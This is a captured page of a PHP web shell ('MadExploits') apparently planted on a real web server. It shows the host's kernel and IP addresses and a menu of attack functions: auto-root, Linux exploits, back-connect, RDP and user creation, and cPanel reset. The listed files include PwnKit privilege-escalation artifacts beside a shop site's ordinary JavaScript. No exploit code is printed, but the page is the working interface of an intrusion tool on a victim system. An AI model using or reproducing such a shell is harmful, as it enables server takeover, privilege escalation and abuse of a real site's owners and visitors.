Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.145.89.175
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
cs /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
bootstrap.min.js
58.64
KB
-rw-r--r--
customjs.js
2.9
KB
-rw-r--r--
jquery-3.6.0.min.js
87.4
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : customjs.js
$.noConflict(); jQuery(document).ready(function () { // jQuery('.nav-tabs > li a[title]').tooltip(); //Wizard jQuery('.wizard a[data-toggle="tab"]').on('shown.bs.tab', function (e) { var target = jQuery(e.target); if (target.parent().hasClass('disabled')) { return false; } }); jQuery(".next-step").click(function (e) { var active = jQuery('.wizard .nav-tabs li.active'); active.next().removeClass('disabled'); nextTab(active); }); jQuery(".prev-step").click(function (e) { var active = jQuery('.wizard .nav-tabs li.active'); prevTab(active); }); function nextTab(elem) { jQuery(elem).next().find('a[data-toggle="tab"]').click(); } function prevTab(elem) { jQuery(elem).prev().find('a[data-toggle="tab"]').click(); } jQuery('.nav-tabs').on('click', 'li', function() { jQuery('.nav-tabs li.active').removeClass('active'); jQuery(this).addClass('active'); }); }); jQuery(document).ready(function () { // mobile menu js jQuery('.nav__trigger').click(function() { jQuery('.nav__menu--right').toggleClass('open'); }); jQuery('.crossbtn svg').click(function() { jQuery('.nav__menu--right').toggleClass('open'); jQuery('.has-collapsible').removeClass('open'); jQuery('.list-mb-dw').removeClass('open-submenu'); }); jQuery('.has-collapsible').click(function() { jQuery(this).toggleClass('open'); jQuery(this).children(".list-mb-dw").toggleClass('open-submenu'); }); // tabs javascript jQuery(".t-tabs li:first-child").addClass("active"); jQuery(".tab-content").hide(); jQuery(".tab-content:first").show(); jQuery(".t-tabs li").click(function () { jQuery(".t-tabs li").removeClass("active"); jQuery(this).addClass("active"); jQuery(".tab-content").hide(); var activeTab = jQuery(this).find("a").attr("href"); jQuery(activeTab).fadeIn(); return false; }); //equal height jQuery(function() { function equalHeightt() { var heightArray = jQuery(".p-slidre-title").map(function() { return jQuery(this).height(); }).get(); var equalHeightt = Math.max.apply(Math, heightArray); jQuery(".p-slidre-title").height(equalHeightt); } equalHeightt(); }); // next pervious step // slider javascript jQuery(".index-popular").owlCarousel({ autoplay: false, rewind: true, margin: 15, responsiveClass: true, dots: false, nav: true, navText: [ '<img src="https://www.competitionsuitshop.com/public/img/left-arrow.png" alt="angle">', '<img src="https://www.competitionsuitshop.com/public/img/right-arrow.png" alt="angle">' ], responsive: { 0: { items: 1, }, 766: { items: 2, }, 1024: { items: 3, }, 1200: { items: 4, }, }, }); });
Close